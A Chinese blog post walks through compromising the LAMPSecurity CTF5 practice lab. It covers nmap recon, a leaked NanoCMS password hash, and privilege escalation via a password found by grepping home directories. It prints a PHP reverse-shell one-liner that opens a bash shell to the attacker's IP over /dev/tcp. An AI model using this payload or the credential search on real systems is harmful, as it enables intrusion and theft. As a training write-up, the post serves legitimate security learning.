【学渗透靶机——CTF5】

已于 2023-06-21 17:19:55 修改
阅读量249 收藏
点赞数
分类专栏: 靶机学习 文章标签: 安全 网络 数据库
于 2023-05-14 14:41:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jieli0901227/article/details/130667080
版权

lampSecurityCTF4

信息收集

主机信息收集

主机ip

nmap -sn 192.168.241.0/24

在这里插入图片描述

主机开放端口

root@kali:/root/baji_100/CTF5# nmap --min-rate 10000 -p- 192.168.241.153

在这里插入图片描述

主机开放端口详细信息

nmap -sT -sV -O  -p22,25,80,110,139,143,445,901,3306,55439  192.168.241.153

在这里插入图片描述

主机漏洞探测

nmap --script=vuln -p22,25,80,110,111,129,143,445,901,3306,55439 192.168.241.153

在这里插入图片描述
总结,通过nmap 扫描主机咯东发现有几个路径存在sql 注入、和枚举
剩余没什么有用信息。 之后在测试

web 信息收集

访问80端口

在这里插入图片描述
通过浏览发现blog 使用的nanocms
在这里插入图片描述
通过搜索searchsploit ,存在远程代码执行,但是需要登录,我们目前没有账号密码
在这里插入图片描述
通过互联网搜索,发信有个密码hash 信息泄露的路径
在这里插入图片描述
访问该路径,果然存在,账号admin 密码 hash
在这里插入图片描述

在线解密 hash,密码为:shannon
在这里插入图片描述
使用账号密码登录后台成功,发现页面中可写,尝试写入反弹shell

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.241.140/443 0>&1'"); ?>

在这里插入图片描述

获取系统初始shell

通过监听443 获取系统初始shell

在这里插入图片描述
(1)查看当前账号有哪些超级权限,发现需要密码 ,尝试shannon 失败
在这里插入图片描述
(2)查看计划任务,没有有效的信息

在这里插入图片描述

(3)查看/etc/passwd, 及shadow ,发现pass好几个用户, shadow 无权限
在这里插入图片描述
(4)搜索pass 关键字信息
多账号下 搜索是否存在账号密码信息

grep -R -i pass /home/*  2>/dev/null  |grep -v jquery

在这里插入图片描述
查看该文件, 密码50$cent
在这里插入图片描述

提权

切换root登录 ,登录成功

在这里插入图片描述

懒惰的老鼠
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
超菜鸟级ctf5
kid的博客
05-18 3919
超菜鸟级ctf5 前言 这次的题整体也比较简单,感觉密码题可能多了点 题目 门太低了 这道题前面也做过类似,考查xss,查看源码也能看到提示xss,这里script必须小写,大写还不行…没什么意思的题啊 New Swan Stone Castle 这中sql注入已经做了很多了,sqlmap都是可以直接跑出来的 这里手工注入的话要闭合括号和双引号。能用sqlmap直接不调参就跑出来,意义...
vulhub渗透测试靶机习1
08-08
渗透测试靶机习0x01 lampiao靶机准备环境靶机下载地址https://download.vulnhub.com/lampiao/Lampiao.zip
Hack the LAMPSecurity: CTF 5 (CTF Challenge)
菜鸟耿耿
12-04 1539
Hack the LAMPSecurity: CTF 5 (CTF Challenge) 你好,朋友!今天,我们将面对另一个称为LAMPSecurity CTF5CTF挑战,这是为实践提供的另一个boot2root挑战,其安全级别适用于初者。因此,让我们尝试突破它。但请注意,您可以先从这里下载 https://www.vulnhub.com/entry/lampsecurity-ctf5,84/ 下载完之后就开始我们今天的挑战啦~~ 实战演练 环境说明 kali IP:192.168.35.128 主机
红队笔记8-CTF5打靶流程-CMS漏洞-多用户信息泄露(vulnhub)
最新发布
qq_63442530的博客
03-26 865
这次的靶场难度不高,但很需要经验,在提权过程中,把能有提权到尝试都去探索了一遍,发现都没有利用点,1.主机发现和端口扫描:端口扫描,发现存活了大量端口,其他很多端口不熟悉,依旧选择从80端口入手2.80端口:通过观察页面,发现是由NanoCMS搭建,存在后台登录窗口,根据想登录后台getshell的思路,寻找密码,最后在通过浏览器搜索到了NanoCMS的凭据泄露漏洞,成功登录后台。
靶机精讲之CTF5
m0_63285023的博客
04-11 185
sudo -l看权限 cat /etc/passwd查看用户目录(提权过程)searchsploit nanocms 搜索漏洞。试着切换root用户,试着拿到更好的shell。-R递归 -i忽略大小写 报错的扔掉。破解字典 -k保留。linux端破解MD5。搜索nanocms漏洞。password密码。
CTF-5.SSH私钥泄露
woo233的博客
09-11 735
如何从外部进入最终root主机,取得flag。
vulnhub靶机练习ctf5
weixin_53665747的博客
06-06 92
靶机整体还是属于较容易,这里自己走了很多弯路,一个是文件包含,一个是不会使用linux自带的强大工具自动化信息收集,还有就是/没有想起路径信息。这三个点花费了我大部分时间。还有就是如何快速定位薄弱资产的能力,对于有已知cms或框架的地方就应该去主攻nday。后面还要多多习linux系统使用。
web渗透测试靶机(新手)
05-07
web渗透测试靶机(新手)
CTF6渗透测试全流程练习靶机
12-14
CTF6渗透测试全流程练习靶机
渗透测试入门——渗透测试笔记
01-27
CMS同样能在网上找到许多漏洞,常用作渗透测试的练习靶机。根据提示,第1题要求找到咨询平台的管理员账号密码;第2题需要登录服务器后台,并插入木马,再用中国菜刀连接,继而找到在管理员桌面上的 flag文件;第3题...
OWASP靶机安全习、测试
05-24
在信息安全中OWASP TOP 10 是渗透测试人员都会涉及到的一个项目,意思是10项最严重的Web 应用程序安全风险列表,该列表总结并更新Web应用程序中最可能、最常见、最危险的十大漏洞。这里包括: A1—注入 A2—失效的...
CMS-Exploit-Framework:CMS 漏洞利用框架
07-10
CMS Exploit Framework 简介 CMS Exploit Framework 是一款 CMS 漏洞利用框架,通过它可以很容易地获取、开发 CMS 漏洞利用插件并对目标应用进行测试。 安装 本框架采用 Python 语言开发,并且第三方依赖包都已打包,所以您所需要做的只是下载、启动。 chu@sh3ll-me:/tmp » git clone https://github.com/chuhades/CMS-Exploit-Framework.git Cloning into 'CMS-Exploit-Framework'... remote: Counting objects: 352, done. remote: Compressing objects: 100% (182/182), done. remote: Total 352 (delta 159), reused
Vulnhub-CTF5靶机实战
御七彩虹猫
05-16 1578
Vulnhub-CTF5靶机实战
ctf web5 练习_安全检查中...
weixin_39866867的博客
12-29 135
+((!+[]+(!![])+!![]+!![]+!![]+!![]+!![]+!![]+[])+(!+[]+(!![])+!![])+(!+[]+(!![])+!![]+!![]+!![]+!![]+!![]+!![])+(!+[]-(!![]))+(!+[]+(!![])+!![]+!![])+(+!![])+(!+[]+(!![])+!![]+!![]+!![]+!![])+(!+[]+(!...
红队打靶:LampSecurity:CTF5打靶思路详解(vulnhub)
Bossfrank的博客
06-20 921
本文是vulnhub靶机LampSecurity:CTF5的打靶思路详解,涉及的知识点包括到关于NanoCMS凭据泄露漏洞利用、历史记录凭据搜索等。靶机不难,但在寻找cms后台登录和提权的过程需要经验。
CTF综合靶机渗透
xv66666的博客
08-11 970
虚拟机难度中等,使用ubuntu(32位),其他软件包有:PHPapacheMySQLBoot to root:从Web应用程序进入虚拟机,并获得root权限。靶机:使用VMWare打开虚机,网络连接方式设置为net,靶机自动获取IP。攻击机:同网段下有Windows攻击机,安装有Nmap、Burpsuit、Sqlmap、nc、Python2.7、DirBuster、AWVS、Nessus等渗透工具,kali攻击机,主要用Windows攻击机完成实验。ip发现启动Billu_b0x虚拟机,由于虚机网络设置为
CTF靶机 DC-3
weixin_52221158的博客
09-02 828
CTF靶场 DC-3详细讲解
LAMPSecurityCTF5渗透测试流程
RemedyVI的博客
07-13 326
80端口可能有SQL注入,数据库为mysql版本大于5.0,可能获取user表信息登录cms后台或其余后台,php版本已知,可能有可利用漏洞,apache版本较老可能有漏洞,openssh版本较老可能有漏洞,操作系统为Linux。猜测该靶机思路:SQL注入->获取后台账户密码->登录后台->利用漏洞获取反弹shell->提权80 Apache httpd 2.2.6 ((Fedora)) (可能存在SQL注入)110 ipop3d 2006k.101 接收邮件。
CTF实践 靶机渗透
Radiency的博客
11-23 1431
CTF实践。通过对目标靶机渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值